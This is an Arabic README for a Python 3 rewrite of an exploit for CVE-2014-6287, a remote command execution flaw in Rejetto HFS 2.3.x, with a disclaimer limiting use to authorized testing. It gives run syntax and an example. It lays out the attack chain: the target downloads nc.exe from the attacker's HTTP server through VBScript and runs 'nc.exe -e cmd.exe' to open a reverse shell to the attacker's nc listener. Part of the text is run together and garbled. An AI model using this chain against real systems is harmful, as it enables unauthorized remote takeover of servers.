
استغلال تنفيذ الأوامر عن بعد لخادم ملفات HTTP من Rejetto الإصدار 2.3.x (CVE-2014-6287) معاد كتابته بلغة Python 3 لاختبار الأمان الهجومي الحديث.
هذه إعادة كتابة بلغة Python 3 للاستغلال الكلاسيكي لتنفيذ الأوامر عن بُعد (RCE) الذي يستهدف Rejetto HTTP File Server (HFS) الإصدار 2.3.x، مستفيدًا من الثغرة المعروفة باسم CVE-2014-6287.
اكتُشفت في الأصل بواسطة Avinash Kumar Thapa المعروف بـ "-Acid"، وتعمل هذه النسخة على تحسين قابلية النقل وسهولة الاستخدام، مع توفير معلمة كاملة وتوافق حديث.
تم توفير هذه الأداة حصريًا للأغراض التعليمية واختبار الاختراق المصرح به. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
nc.exenc.exe عبر VBScriptnc.exenc.exe -e cmd.exe لإنشاء reverse shellpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
مثال:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
المتطلبات:
- خادم HTTP يقدم nc.exe:
python3 -m http.server 8000
- مستمع:
nc -lvnp 4444